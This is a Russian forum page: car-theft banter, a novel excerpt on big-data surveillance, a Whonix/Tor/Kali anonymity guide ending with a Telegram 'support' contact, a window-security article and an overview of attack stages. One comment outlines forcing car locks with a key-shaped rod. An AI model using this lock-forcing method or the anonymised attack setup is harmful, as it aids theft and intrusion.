Дубликаты не найдены

+1

Ваз имеет смысл запирать, только если опасаешься, что внутри насрут...

раскрыть ветку 4
0
Приехал мужик на ниве к Бару, вышел, захлопывает дверь, и никак не может захлопнуть.Тут рядом мужик проходит, и говорит:
-Чё ты паришся?? Я вот свою никогда не закрываю! Тут все нормальные, никто не угонит. 
А тот отвечает: 
-Я вот тоже так думал, оставил дверь, а мне Бюрер залез, и под седуху насрал!
раскрыть ветку 1
0

Дадада, именно это я и вспомнил

0

Одна из самых угоняемых машин. Причина проста, его проще всего сбыть по запчастям, как и многие другие отечественные. И угнать его так же проще.

раскрыть ветку 1
0

Мне кажется в данном случае хозяину делают одолжение

0
А хули толку, такие замки обычной сверткой выносятся на раз, из приспособ нужен каленый стерженек по форме напоминающий ключ (та самая свёртка) с пазом под гаечный ключ и, собственно, гаечный ключ подлиннее. Вставил, крутнул - готово.
0
Вот суки, а градусник с лобовухи таки спиздили.
Иллюстрация к комментарию
0
Че там пиздить то??два лома и расписание автобусов с дачи?
раскрыть ветку 1
+1
Не поверите, у меня спиздили отвертку за 50 р, и набор предохранителей и все. Ладно хоть форточку аккуратно выставили. Авто 2109
0
-а если и эти замки сорвут, то что?
-аа на этот случай я все ценное вытащил, да и вообще она не моя..
0

Уникальные технологии безопасности Ладарджини

Похожие посты
330

Ответ на пост «Как добиться максимальной анонимности с ноутбука или компьютера» 

Из книги Павла Иевлева серия УАЗДАО

Я не знаю всех применений бигдаты — подозреваю, их не знает никто. Но есть одна функция, которая ей несомненно присуща — автоматическое и моментальное выявление любых поведенческих аномалий. Потому все любители конспирологии, прячущиеся от Большого Брата путём использования анонимных мэйл-сервисов, стойкого шифрования и сетей Tor, общающиеся исключительно в даркнете через ретрошару и молящиеся на биткоин, на самом деле просто вешают на себя мигалки с сиренами и огромный плакат: «Эй, посмотрите, со мной что-то не так!!!». И, натурально, смотрят. Нет, никто не взламывает их защищённые емейлы, не читает их самостирающиеся торчаты, и не расшифровывает их криптостойких посланий. Зачем? Это хлопотно, затратно, а главное — не нужно. Не нужно перехватывать распределённый питупи-трафик Тора, достаточно уверенно опознавать сигнатуру его использования, чтобы где-то зажглась первая красная лампочка — эй, этот парень пользуется Тором! А ну-ка давайте посмотрим — он просто торренты с порнухой ищет, или, к примеру, рецепт гексогена? Опять же, для этого не нужно ничего криптостойкого ломать, и никакие суперхакеры кэйджиби с красными глазами под фуражкой не встанут на ваш виртуальный след. Просто внимание системы к вашим поисковым запросам будет чуть повышено, и, если, например, вы недавно интересовались у гугля, как сделать электронный таймер из будильника — где-то зажжётся вторая лампочка, чуть ярче первой. А если вы вскоре заказали с алиэкспресса копеечный электронный модуль, на котором есть красный и синий провод и бегущие к нулю циферки, то после лампочки может пискнуть первый зуммер. А если среди ваших подписок во вконтактике окажутся при этом некие совершенно безобидные на первый взгляд сообщества любителей арабского языка или поговорить за ислам, то вы вполне можете заслужить первое персональное повышение статуса — вас переведут на контроль. Пока не персональный, просто вы попадёте в раздел базы данных «на общем мониторинге». Теперь на ваши лампочки и зуммеры будут реагировать уже не только эвристические алгоритмы распределённых вычислительных сетей, но и некий неравнодушный умный человек, который умеет сделать вывод о существовании океана по капле воды. Следующую стадию — персональный мониторинг, — надо заслужить, но, если вам это удалось, то, скорее всего, дело рано или поздно кончится совершено невиртуальным визитом серьёзно настроенных людей, которым, опять же, и в голову не придёт взламывать шифрование ваших труекрипт-дисков. Зачем? Вы сами всё расшифруете, покажете и расскажете. Даже не сомневайтесь в этом.
«Ха-ха, ну мне-то это нет грозит,» — подумает наивный пользователь, прочитавший этот абзац, — «Я-то не дурак искать в гугле рецепт динамита и схемы минирования мостов!». Отчасти он будет прав — но только отчасти. Даже если вы перестали покупать в ближнем магазине пиво и стали покупать водку — на это уже сработает какой-то триггер. Ваше потребительское поведение изменилось. Почему? Может, вы становитесь алкоголиком, и вас следует внести в группы повышенного контроля по этому параметру? Скорее всего, ничего не произойдёт. Но не исключено, что вы нарвётесь на неожиданно жёсткую проверку при попытке получить оружейную лицензию, кто знает? Я не знаю, кстати, это не моя область компетенции.
На самом деле никто не знает, как формируются триггеры, потому что задаёт их, как ни странно, тоже машина. Как? Ну вот знаем мы, к примеру, что этот мутный поц относится к исламским террористам. Или, наоборот, к буддийским похуистам, неважно. Машина считывает всё, что по нему есть, и сравнивает с такими же террористами/похуистами и с контрольной группой. Совпадения суммируются, расхождения учитываются, и выводится какой-то общий по группе набор ключевых определяющих паттернов. Какой, из чего он состоит — опухнешь вникать, это может быть тысяча триггеров или больше. Жизни человеческой не хватит проверить всё, поэтому в то, что работает, — не лезут. Вот если ошибки — тогда могут вручную проверить, наверное. Но система умеет самокорректироваться, так что ошибки бывают редко. С одной стороны, немного странно, что фактически людей контролирует машина, да ещё и по самосозданному ей же алгоритму — отдаёт какой-то дурной фантастикой про порабощение человечества тостерами. А с другой — в этом вся бигдата. Она принципиально оперирует слишком большими объёмами данных, чтобы человек мог контролировать процессы в деталях.
Поэтому я, как мало кто другой, понимал, что сохранить в тайне наш маленький (размером с целый мир) секрет — это на грани невозможного. Моя работа открыла мне некоторые новые грани понимания того, как работает система, но она же и обозначила меня для неё как один из приоритетных объектов. Это нигде не упоминалось прямо, но подразумевалось — мы в системе, а значит по умолчанию в мониторинге. Моя работа не только не требовала погон, она даже не включала режима секретности — я работал только с открытыми данными, никаких государственных тайн, никаких подписок, никаких ограничений в выезде и так далее. Всё, что я мог выяснить по работе, бралось исключительно из «паблика» — публичного информационного пространства, открытого всем желающим. Блоги, форумы, чат-платформы, социальные сети — это бездны информации, если уметь её просеивать. Чтобы узнать, каких именно военспецов размещает НАТО в Польше, не нужно прогрызать тёмной ночью сейф в подвалах Пентагона, достаточно посмотреть, что постят эти спецы в своих инстаграммах. Не виды ли Влтавы? Я очень сильно упрощаю, разумеется, но общий принцип такой. Даже если этим спецам, к примеру, запрещено постить виды Влтавы и селфи с благодарными польскими проститутками, и даже если предположить невероятное — что они все этот запрет соблюдают, — то можно навестись на то, что они перестали постить в инстаграмм свою выкошенную лужайку в Айове и пухлых детей вокруг барбекюшницы. Изменение поведенческого паттерна, понимаете?
Так вот, стоит измениться моему поведенческому паттерну, система сразу подаст сигнал, ведь я уже не в нижней группе приоритета. Американцы в фильмах любят пафосно сказать: «Я работаю на правительство!». (Вопиющую абсурдность этого утверждения не замечает только тот, кто представляет себе некое монолитное «правительство», на которое можно работать. На самом деле ничего подобного в природе не существует.) Я же работал на некую информационно-сервисную структуру, определённым сложным образом ассоциированную с некими группами, каким-то боком участвующими в формировании государственной политики. С какими именно — до нашего сведения никто не доводил, незачем. Однако я для системы уже не был пустым местом, на которое надо реагировать только когда накопится определённый тревожный анамнез. Если я как-то подозрительно задёргаюсь, то меня спалят сразу.
Вообще, если честно, я уже наверняка задел какие-то сигнальные паутинки — спонтанная покупка в гипермаркете целой кучи неожиданных хозяйственных мелочей (по карточке, вот я кретин!). Двукратное пропадание телефона из сети в одной и той же точке (надо было бросать его в гараже, я не подумал). Синхронное во второй раз пропадание там же телефона жены. Неожиданно и без повода взятый женой БС (это уже в компьютере бухгалтерии, а значит в системе), неплановое изъятие ребёнка из садика (сразу в систему не попадёт, они на бумажке пишут, но по итогам месяца засветится, когда оплату проведут). Вообще-то само по себе это пока на полноценный алярм не тянет. Ну, наверное. Я ж не знаю, какой по нам, аналитикам среднего звена, уровень тревожности выставлен, и уж тем более не знаю, какие триггеры. Мало ли, купили всякого барахла, свезли в гараж, а что телефоны погасли… ну, например, положили их неудачно. Если по мне работает только машина, то с высокой вероятностью я уровень алертности не превысил. Если попал в выборочный контроль живым оператором (для постоянного я уж точно слишком мелкий), то он мог и напрячься. А мог и нет — в гараж я мотаюсь регулярно. С женой редко — но тоже бывает. Тормоза, к примеру, прокачать, почему нет? Может мы их сейчас как раз прокачиваем… Пыхтим и качаем, а они всё никак… Но это сработает один раз, дальше надо думать. Думать я умею, мне за это деньги платят. Деньги не бог весть какие большие, но для нашей провинции заплата приличная. И вообще недурная работа — интересная. Узнаёшь много всего нового постоянно. Только что сидячая.
Само по себе изменение поведенческих паттернов скрыть нельзя. Никак. Просто никак, даже думать в эту сторону не стоит. Даже если, к примеру, закупать всё за наличку — сразу палишься тем, что начал наличить много денег. Зачем? Ведь до сих пор карточкой везде платил… Несколько покупок за наличку в гипере, и локализация твоего смарта синхронизируется по времени с твоим чеком, камеры на парковке читают номер твоей машины, и так далее. Большинство гиперов имеют систему контроля проходимости торговой точки, которая отсекает вход-выход клиента по слабенькой вайфайной точке доступа возле касс или дверей. Смарту не надо в ней регистрироваться — дефолтную регистрацию во всех открытых сетях оставляют включённой уж совсем полные придурки, — но достаточно обменяться пакетами и всё, вас посчитали. Даже если вайфай, как вы думаете, на телефоне «выключен». Покупать на рынке? Свяжутся обнал и локализация. Да, что именно ты купил у той бабки система понять пока не может, но само по себе сигнал. Никогда на рынок не ездил, а тут вдруг зачастил… С чего бы это?
Наличка от контроля не спасает, это иллюзия. Наоборот, подозрительно — особенно если у вас в паттерне регулярное использование карточки. Поэтому наличку сейчас вытесняют из оборота относительно вяло — непринципиальный вопрос. Наоборот, упёртые любители налички в безналичном обществе сами себя метят — у нас ещё не так, а в Европе-Америке наличка — однозначный маркер маргинала. Всякие детские наивные хитрости, вроде телефонов с левой симкой и подставных аккаунтов для смартфона тем более оставим любителям бездарных шпионских игр. Что же можно сделать?
Раз скрыть изменение паттерна невозможно, его надо легализовать. Любой человек может радикально сменить паттерн по самым безобидным причинам. Например, если вы едете в отпуск, у вас вдруг резко меняется всё — локализация, шаблон потребления, средний уровень расходов, ближний круг контактов, объём и тип потребляемого трафика, частота и сентимент-маркеры постинга в соцсети… Для системы вы вдруг становитесь совершенно другим человеком! Соответственно существует и механизм отработки такого алярма — автоматический при попадании в стандартный блок паттернов: «ага, чекин в турфирме, крем от загара и плавки в чеке, билеты, регистрация, перелёт, дальше счёта из бара и снятия в местной валюте — понятно, человек просто в отпуске, отбой». Ну или если «персонаж в мониторинге» и по нему высокий уровень алертности системы — тут уже кто-то может глазами посмотреть ситуацию. Машина-то нюансов не видит, ей сходу трудно понять, бухать вы в Египет поехали или, например, в шахиды записываться.

Показать полностью
1272

Как добиться максимальной анонимности с ноутбука или компьютера

То что за нами каждый день следят уже ни для кого не секрет, а ваши переписки из VK или поисковые запросы отдадут по первому требованию правоохранительных органов. Я тот кого эта тема затронула на прямую.

Сегодня я научу вас максимально анонимизировать свой трафик и местоположение сидя за своим рабочим местом.

Я не побуждаю вас к незаконным действиям этот мануал и все последующие лишь обзор инструментов для тех или иных нужд.

Есть много уязвимостей которые помогут вас найти и ваш человеческий фактор играет далеко не последнюю роль.
Не думайте, что проделав все действия вы будете в 100% безопасности и конфиденциальности.

Как добиться максимальной анонимности с ноутбука или компьютера Cryptocurrency, Хакеры, Интернет-Провайдеры, Защита, Анонимность, Взлом, Длиннопост

Шаг 1. Whonix

Скачиваем и устанавливаем виртуальную машину Virtual Box. На других не пробовал.

https://www.virtualbox.org/wiki/Downloads

Скачиваем дистрибутив Whonix с официального сайта.

https://www.whonix.org/wiki/VirtualBox/XFCE

Импортируем скачанный дистрибутив в виртуалку.

Как добиться максимальной анонимности с ноутбука или компьютера Cryptocurrency, Хакеры, Интернет-Провайдеры, Защита, Анонимность, Взлом, Длиннопост

У вас появятся 2 машины:

Как добиться максимальной анонимности с ноутбука или компьютера Cryptocurrency, Хакеры, Интернет-Провайдеры, Защита, Анонимность, Взлом, Длиннопост

Запускаем Whonix-Gateway-XFCE.

Как правило они устанавливаются уже с оптимальными настройками, поэтому можно сразу запускать. Вначале запускаем Gateway, затем Workstation.

При первом запуске, в обоих системах перед нами появиться окно в котором выбираем “Understood” и жмём “Next”, во втором появившемся окне повторяем аналогично, появится надпись “Whonix Setup is completed”, после чего можем жать “Finish”.

На Gateway появиться окно “Anon Connection Wizard” выбираем “Connect” и жмём “Next” а потом “Finish.”

Как добиться максимальной анонимности с ноутбука или компьютера Cryptocurrency, Хакеры, Интернет-Провайдеры, Защита, Анонимность, Взлом, Длиннопост

Теперь обновляем систему, открываем терминал и пишем:

sudo apt-get update
sudo apt-get dist-upgrade -y

стандартный пароль: changeme

Ждём пока обе системы обновятся, это может занять порядочно времени, а после окончания нужно проверить всё ли у нас в порядке, для этого в терминале вводим:

whonixcheck

И проверяем что ваш IP сменился:

curl ident.me

Обновим Tor Browser:

update-torbrowser

Шаг 2. Kali Linux

Скачиваем дистрибутив и так-же импортируем в Virtual Box.

https://www.offensive-security.com/kali-linux-vm-vmware-virt...

Запускаем и обновляем:

sudo apt update && sudo apt full-upgrade -y

Выключаем Kali Linux.

Заходим в настройки и меняем в разделе "Сеть" тип подключения на "Внутренняя сеть".

Как добиться максимальной анонимности с ноутбука или компьютера Cryptocurrency, Хакеры, Интернет-Провайдеры, Защита, Анонимность, Взлом, Длиннопост

Запускаемся с Kali Linux, интернета у нас пока не будет, так как через шлюз направлен Тор-трафик а Kali мы еще не научили его принимать.

Отключаем сетевой адаптер:

sudo ip link set eth0 down

Редактируем файл:

sudo mousepad /etc/resolv.conf

Удаляем всё что в нем есть и меняем на

nameserver 10.152.152.10

Как добиться максимальной анонимности с ноутбука или компьютера Cryptocurrency, Хакеры, Интернет-Провайдеры, Защита, Анонимность, Взлом, Длиннопост

Теперь отредактируем файл /etc/network/interfaces, пишем в терминале:

sudo mousepad /etc/network/interfaces

И в конец этого файла дописываем:

auto eth0
iface eth0 inet static
address 10.152.152.11
netmask 255.255.192.0
gateway 10.152.152.10

Сохраняем и можем запустить наш сетевой адаптер:

ip link set eth0 up

Чтобы убедиться что трафик действительно идет чекаем на whoer.net

Мы получили полностью изолированную операционную систему, весь трафик которой идет через сеть Tor.

Шаг 3. Провайдер (DNS-Leak)


Дело в том что провайдер видит как мы выходим в интернет через сеть тор.

Что-бы избежать прослушки нашего трафика провайдером нам нужно его зашифровать или скрыть.

Самый простой вариант поменять наши ДНС.

Как добиться максимальной анонимности с ноутбука или компьютера Cryptocurrency, Хакеры, Интернет-Провайдеры, Защита, Анонимность, Взлом, Длиннопост

Есть еще способы скрыться от провайдера, есть инструмент "dns crypt" можете найти его в интернете, но я им не пользовался.

Шаг 4. WebRTC

У браузеров есть встроенная функция WebRTC, она нужна в некоторых приложениях для использования p2p, это позволяет соединять 2-х клиентов напрямую друг с другом, эту уязвимость можно использовать, что-бы раскрыть ваш реальный IP адрес даже если вы используете VPN.

Шаг 4. Дополнительно

На своей Хост-машине, можете использовать VPN только если вы ему на 100% доверяете и никогда не оплачивайте подобные сервисы со своей карты и своего IP

Если у вас есть что дополнить можете написать и предложить мне, я буду рад обсудить любую интересную информацию.

Подобный гайд я находил на другом форуме, но он был не полный и запутанный, тут я привел больше методов и протестировал на своём железе, так что поручаюсь что все что здесь написано актуально и если что-то не работает можете писать я вас проконсультирую в своем Телеграме:
@BTCWallet_support

Показать полностью 5
148

Защита вашего дома. Периметр: окна

Здравствуйте, дорогие пикабутяне.


Начинаю потихоньку публиковать цикл ознакомительных статей на тему защиты дома/квартиры от ушлых и не очень злоумышленников. Я планировал начать писать об этом уже давно, и сподвигли на это меня, профессионального лентяя, несколько любопытных людей, в частности, @RonD и @Pilul.  Рейтинг мне не нужен, поэтому все статьи будут публиковаться в теге без рейтинга. Главное, чтобы всё это действительно помогло вам в наше не слишком спокойное время.

Защита вашего дома. Периметр: окна Окна ПВХ, Взлом, Защита, Борьба с ворами, Без рейтинга, Длиннопост, Видео, Гифка

Первая статья цикла будет посвящена очень важной и часто незаслуженно игнорируемой точке проникновения в дом - окнам. Жителям первых/последних этажей многоквартирных домов эта проблема знакома не понаслышке. Однако, обычно всё ограничивается установкой наружных решеток с подозрительным креплением и еще более сомнительным дизайном. А жители последних этажей остаются даже без такого механизма защиты.


Предотвращение проникновения через окна/балконы важно не только для вышеозначенных категорий квартир, но и для других этажей, так как воров-промальпов*, или им подражающих Итанов Хантов, достаточно на просторах нашей необъятной родины.

Примечание

промальпы - промышленные альпинисты

Защите стеклопакета я уделю немного меньше внимания и времени, так как, по сути, вариантов защиты, из известных мне, всего два:


1. Защитные пленки на стекло

Они бывают разных видов, как прозрачные, так и комбинированные (энергосберегающие, зеркальные, матовые, солнцезащитные). Такие пленки вполне могут заменять решетки для жителей последних этажей, не привлекая внимания и при этом усложняя проникновение злоумышленника висящего на высоте, после того как у него не получится отжать створку (об этом дальше в статье).

Конечно, подобные пленки могут использоваться кем угодно, не только самой рискованной категорией жителей (первый/последний этажи), потому как могут защитить от внезапного фейерверка или камня/мяча в окно.

Защита вашего дома. Периметр: окна Окна ПВХ, Взлом, Защита, Борьба с ворами, Без рейтинга, Длиннопост, Видео, Гифка

2. Защищенное стекло

Этот вариант дороже и сложней в устройстве, но тоже заслуживает внимания. Подобные стекла могут попасть в ваше окно только при производстве, либо при полной замене створок. Устройство подобного стеклопакета, триплекса, отличается от первого варианта тем, что используются закаленные стекла, которые в дальнейшем также покрывают защитными пленками. Такой вариант защиты может быть более интересен из-за технологии сборки - слои стекол и сам стеклопакет закрепляются специальным полимерным клеем, что усложняет попытки выдавить стеклопакет из рамы створки.

Защита вашего дома. Периметр: окна Окна ПВХ, Взлом, Защита, Борьба с ворами, Без рейтинга, Длиннопост, Видео, Гифка
Теперь переходим к основной теме - защита от вскрытия пластикового окна. Как это обычно происходит продемонстрировано в видео ниже.

Как видите, все довольно просто и быстро. В этом плане, деревянные окна были надежней :) Порой продажники и охранные компании говорят о том, что не стоит опасаться вскрытия окна на 2-3-... этаже. Учитывая, что взлом обычного окна настолько прост, надеюсь, теперь вы внимательней отнесетесь к тому, что говорят эти люди.


Среди способов защиты от отжатия есть несколько неплохих вариантов. Часть из них будут лишь полумерами, но максимально дешевыми и простыми в установке. Другие же, особенно в связке с сигнализацией, превратят ваши окна в неприступный бастион, но по стоимости и трудоёмкости установки выходят за рамки обычного DIY*. Хотя, при должной сноровке, противовзломную фурнитуру вы сможете установить самостоятельно.

Примечание

DIY - do it yourself, известная аббревиатура, переводится как "сделай это сам". Важный момент "сделай сам" в вопросах защиты дома, когда вам действительно есть что защищать (деньги, ценности, документы, пр.) - если защиту вы организовываете сами, то и риск утечки деталей вашего плана минимален. Не стоит недооценивать воров, многие из них и их наводчиков в обычной жизни работают курьерами, сантехниками, столярами, мастерами на час и пр.

Итак:

1. Противовзломная фурнитура

Самая важная и базовая часть нормальной защиты окна - она встраивается в створку. При отжатии, обычно, происходит соскальзывание с запирающей цапфы и окно открывается настежь. Противовзломная фурнитура исправляет этот косяк стандартных запорных механизмов особой формой цапф, грибовидной, и ответными планками, в которых эти цапфы фиксируются при закрытии окна. Планки отличаются от стандартных тем, что фиксируются не на соплях ПВХ, а соединяются шурупами с металлопрофилем окна. Ну и конечно материалом исполнения - цапфы и планки выполняются из титана/закаленной стали.

Защита вашего дома. Периметр: окна Окна ПВХ, Взлом, Защита, Борьба с ворами, Без рейтинга, Длиннопост, Видео, Гифка

Определяют несколько классов защиты подобной фурнитуры, но, честно говоря, все они кроме третьего класса (WK3) не имеют смысла, если уж вы решили установить защитную фурнитуру. Третий класс защиты гарантирует максимальную защиту не только всего периметра створки, но и ножниц, и углового переключателя, их тоже нельзя оставлять без блокировки, так как отжимать створку воры могут не только снизу створки/середину с замком.

Защита вашего дома. Периметр: окна Окна ПВХ, Взлом, Защита, Борьба с ворами, Без рейтинга, Длиннопост, Видео, Гифка
Также важно подбирать фурнитуру, которая предусматривает установку защитной пластины на механизм запора (там где ручка у окна). Например, ROTO Swing Secustic. Иногда воры могут пытаться высверливать замок окна, чтобы повернуть запор самостоятельно. С защитной пластиной процесс высверливания может значительно затянуться, а это гарантия отказа от проникновения таким способом - дольше 5 минут возиться мало кто из них будет.


2. Внутренние решетки и рольставни

Стандартные решетки - решение очень спорное. Вскрыть их для наркоманов и прочих маргиналов может быть и не под силу, но многое зависит от конструкции и тех, кто устанавливал решетки. Думаю, рассказывать про рывок решетки машиной, выворачивание ломом или домкратом вы уже могли слышать. Это очень заметно, но воры бывают разные и не все среди них ниндзя. Вариант внутренних решеток и рольставень интересен в первую очередь тем, кто пользуется услугами охранной сигнализации, с контролем окон не только PIR-датчиками*, но и на размыкание створки/разбитие стекла. Логика защиты очень простая - когда злоумышленник-таки смог открыть окно, ему для свободного доступа в помещение придется преодолеть ещё один контур защиты, а в это время отряд ГБР уже едет наградить его за упорство.


Именно поэтому решетка внутри помещения более серьёзная защита, чем во вне. Варианты с решетками внутри стеклопакета, наверное, имеют право на жизнь, но при этом теряется смысл второго контура и надежда только на запорный механизм. Сами по себе решетки для внутреннего исполнения оптимально лучше брать складывающиеся "гармошкой", в таком случае при сборке они занимают 10-20% от площади окна, а некоторое позволяют себя повернуть вдоль стены и тем самым уменьшают занимаемую собой площадь до 2-3%. Красиво, удобно и вы защищены.

Защита вашего дома. Периметр: окна Окна ПВХ, Взлом, Защита, Борьба с ворами, Без рейтинга, Длиннопост, Видео, Гифка

Касаемо рольставень, их нужно для таких целей брать с экструдированными* профилями. В таком случае, выломать их будет гораздо сложней пустотелых.

Защита вашего дома. Периметр: окна Окна ПВХ, Взлом, Защита, Борьба с ворами, Без рейтинга, Длиннопост, Видео, Гифка

Примечание

PIR-датчик - самая популярная разновидность датчиков движения, реагирует на излучения в инфракрасном диапазоне, на тепло

экструдированными - усиленные ребрами жесткости

3. Детские замки

Это как раз дешево и сердито. Сразу оговорюсь, что под детскими замками для защиты я не имею в виду обычные запорные ручки с замком. Толку от них мало, а в вопросах защиты от отжатия окна - вообще никакого. Среди остальных вариантов мне больше всего понравились замки Baby Safe Lock.

Защита вашего дома. Периметр: окна Окна ПВХ, Взлом, Защита, Борьба с ворами, Без рейтинга, Длиннопост, Видео, Гифка

Они устанавливаются несколько сложней турецких Penkid/британских Jackloc, но выполнены более продуманно (полотно фиксируется в запорном механизме BSL-замка за счет двух шурупов в металлопрофиле створки, при этом степеней свободы значительно меньше, чем в случае тросика Jackloc). Но очень важно, чтобы точек фиксирования было больше одной, в идеале снизу и сверху створки. Иначе, вор весом своего тела может попытаться помочь окну слететь с катушек и у него получится, если точек фиксажа недостаточно.


Замок Penkid

Защита вашего дома. Периметр: окна Окна ПВХ, Взлом, Защита, Борьба с ворами, Без рейтинга, Длиннопост, Видео, Гифка

Замок Jackloc

Защита вашего дома. Периметр: окна Окна ПВХ, Взлом, Защита, Борьба с ворами, Без рейтинга, Длиннопост, Видео, Гифка

Ну и конечно, бонусом с таким запорам прилагается защита от выпадения детей. Проблема тоже достаточно серьёзная и хорошо, если одним выстрелом получится со всеми зайцами разобраться.


Эпилог

На данный момент, это базовые методы обеспечения безопасности окон, с которыми я так или иначе знаком. Никогда не был сторонником стандартной защиты, поэтому все перечисленное выше интересно в каком-то разумном комплексном решении. И ещё лучше, если его детали вы придумаете для себя сами.


Большинство воров всё-таки люди пока ещё и чаще работают конвейером - пытаются проникнуть поочередно в несколько квартир на этаже/в подъезде, в надежде на успех такой ковровой бомбардировки. При столкновении со сложностями чаще всего отступают, даже при целевой работе.

К слову о целенаправленном проникновении - обращайте внимание на странности около дверей/окон: следы сверления, стружка пластиковая/древесная/металлическая, или наоборот излишне вычищенная поверхность под дверью, слабое крепление броне/обычных накладок и пр. Иногда внимание к таким деталям может вас спасти от повторного захода вора-неудачника. И во второй раз он может быть уже гораздо более подготовленным к внезапностям.

Если у вас есть, что добавить/исправить/оспорить - пишите в комментариях, буду рад дискуссии на данную тему, так как сам ещё многому учусь и новые направления крайне интересны.


Защита дверей, стен, полов, потолков, тамбуров, особенности установки сигнализации, дополнительные уловки для защиты от кражи на рывок и некоторые другие деталей я постараюсь подробно описать в следующих статьях цикла. До новых встреч :)


P. S.

1. Статья создана с использованием материалов сайтов:

http://fasdoma.ru/osteklenie/okna-pvx/protivovzlomnaya-furni...

https://www.plastok.ru/windows/options/reshetki-rehau.html

http://www.hesco.ru/zashita.html

http://www.uniteko.com.ua/zaschitnie-plenki/

http://alians-okna.ru/sell/zakalennoe.htm

http://www.rollety.in.ua/vidy-profiley/

Примечание: я не советую и не рекламирую данные ресурсы, так как их услугами не пользовался и не могу гарантировать профессиональный подход к защите.


2. При поиске подходящих поставщиков старайтесь максимально внимательно исследовать отзывы, как минимум в Москве работает много мошенников с похожими номерами телефонов, которые просят предоплату за свои услуги, но фактически их не предоставляют. По отзывам таких легко вычислить.


3. У меня огромная беда с орфографией. GNazi, примите мои искренние извинения за возможные орфоинфаркты :(

Показать полностью 9 1
101

Основы информационной безопасности

О понятии "информационная безопасность" (ИБ) каждый из нас много слышал, но для большинства эти слова остаются пустым звуком. Для подавляющего большинства их тех кто имеет представление об информационной безопасности её базовые принципы являются тайной за семью печатями и только единицы профессионалов могут рассказать что такое информационная безопасность. Специалисты-практики ничего нового не узнают, а вот "обывателям" будет полезно.


В свое время (в том числе и недавно) я лопатил горы информации в поисках основ информационной безопасности и получил... Горы бесполезной информации. Почему бесполезной? Потому что нет скоординированного подхода к проблеме. В зависимости от автора, целей и задач существует море подходов, классификаций и теорий в ИБ, но вот единой системы нет. Поэтому текст ниже - краткое обобщение практики собранной за 14 лет.


Во-первых уничтожим несколько штампов, во-вторых разберемся что такое практическая информационная безопасность и в-третьих будут накопленные за 14 лет практические советы.


Штампы:


1. Хакеры - взломщики. Это вообще не так, это специалисты экстра-класса. Слово произошло от глагола to hack - "топорная работа", так называли (и называют) специалистов способных выжать 120 % (и более) из софта и железа и знающие системы лучше их создателей. Хакеры не "злобные взломщики" (хотя одно другого не исключает), это именно специалисты экстра-класса независимо от того чем они занимаются.

2. Антивирусное ПО защищает компьютер. Не защищает и в принципе не может защитить компьютер от всех угроз, предел возможностей антивирусов - отсеивание отработавшей своё, но не вычищенной шушеры.

3. Есть единая система по которой можно настроить и забыть про угрозы ИБ. Не существует и не может существовать в природе.

4. Производители ПО заботятся об информационной безопасности. Поиск угроз ИБ в программных продуктах - дело требующее высокой квалификации и огромных затрат времени, а это - во-первых увеличение бюджета разработки в разы (а иногда - десятки раз), а во-вторых потребность в специалистах, коих на рынке буквально считанные единицы.

5. Можно защитится от угроз ИБ (как вариант компьютер в офф-лайн). Нельзя, не только существуют, но и активно применяются методы взлома и офф-лайн машин.


Практическая информационная безопасность:


Взломщики (те кто ломают софт, сервера и пишут вирусы) делятся на 2 категории:

1. За деньги. Это те кто осуществляют атаки за деньги.

2. За идею. Те кто ломают во-первых чтобы посмотреть как оно работает (по аналогии со вскрытием лабораторных животных), во-вторых получить заслуженное уважение от коллег, в-третьих достичь каких-то личных целей.

Самая опасна для ИБ именно вторая категория. Если взломщик-идеалист заинтересуется Вашей системой, то вопрос взлома - это вопрос времени.


Поэтому первой аксиомой практической ИБ является расчет на то, что Вас уже взломали.


Давайте пойдем дальше и ответим на ключевые вопросы (которыми 99% людей даже не задается): что такое взлом и как собственно он происходит?


Взлом - несанкционированное (не разрешенное) вмешательство в работу информационной инфраструктуры, которое нарушает информацию в виде:

1. Создания информации - загрузка на атакуемые ЭВМ новой информации или программного обеспечения.

2. Изменения информации - изменение данных и программного обеспечения.

3. Копирования информации - копирование на информационные носители данных с ЭВМ жертвы.

4. Удаления информации - уничтожение информации на ЭВМ жертвы.

5. Отказа в обслуживании - произведение действий в результате которых ЭВМ жертвы не сможет выполнять возложенных задач.


Как происходит взлом (обобщение прочитанных "мемуаров" взломщиков):


Первым делом взломщик собирает информацию об атакуемой системе. Тема о том сколько всего можно узнать исследуя сетевой трафик от жертвы даже не на пост - на целую серию постов. Но в итоге у взломщика есть информация о том что именно он атакует.


Вторая стадия - создание копии атакуемой системе в виртуальной или реальной среде. Эта стадия нужна для отработки механизма атаки, хотя при некоторых условиях эта стадия отсутствует.


Третья стадия - создание инструмента взлома (или использование готового).


Четвертая стадия - тестирование инструмента на средствах антивирусной защиты. Вирус который распознается "на раз" никому не нужен, поэтому качественно подготовленный для использования в атаке инструмент спокойно пройдет любую антивирусную защиту.


Пятая стадия - подготовка атаки. На этой стадии разрабатываются способы обхода внешних защит информационной инфраструктуры и решаются проблемы доступа.


Шестая стадия - взлом. Это именно то, что показывают в фильмах - готовые инструменты используются в готовых каналах для атаки.


Седьмая стадия - использование результатов атаки.


Советы:


0. Делайте копии важной информации. Копий рабочих данных должно быть не менее 2-х, критических данных - не менее 4-х, при этом копии должны размещаться так, чтобы не быть поврежденными/уничтоженными при атаке или при каком-либо происшествии.

1. Используйте антивирусы. Очень мало случаев, когда атака производилась чисто на одну информационную инфраструктуру. В основном атакуется некоторый сегмент в который входит атакуемый объект. При этом атака удается, а спустя некоторое время (от суток до нескольких лет) вирусы используемые при атаке попадают к антивирусным компаниям и они обновляют свои базы. Антивирус просто отсеет летающие по сети ошметки давно прошедших взломов и позволит сосредоточиться на текущих угрозах ИБ.

2. Используйте файерволы (как минимум на шлюзах). Очень рекомендуется их использовать в ручном режиме и на каждом устройстве. Рекомендуемая настройка на рабочих станциях - запрет всех входящих подключений, разрешены исходящие подключения. Рекомендуемая настройка на серверах - разрешение на конкретные порты конкретным клиентам.

3. Разграничивайте сети и закройте доступ к общим папкам. Достаточно многие вирусы могут атаковать через сеть и через общедоступные ресурсы.

4. Используйте по максимуму виртуализацию. Виртуальная машина проигрывает по производительности реальной, но является обычным файлом, который легко скопировать и при необходимости скопировать обратно. Таким образом восстановление работоспособности занимает минимальное время и снижает убытки.

5. На компьютерах должно быть установлено минимальное количество ПО. Неуязвимого ПО нет, а в погоне за клиентом все дружно забили на ИБ, поэтому каждая программа - набор дырок в ИБ и чем меньше софта, тем меньше потенциальных проблем. Такая же позиция должна быть занята и по отношению к службам запущенных на компьютерах - только необходимые для работы.

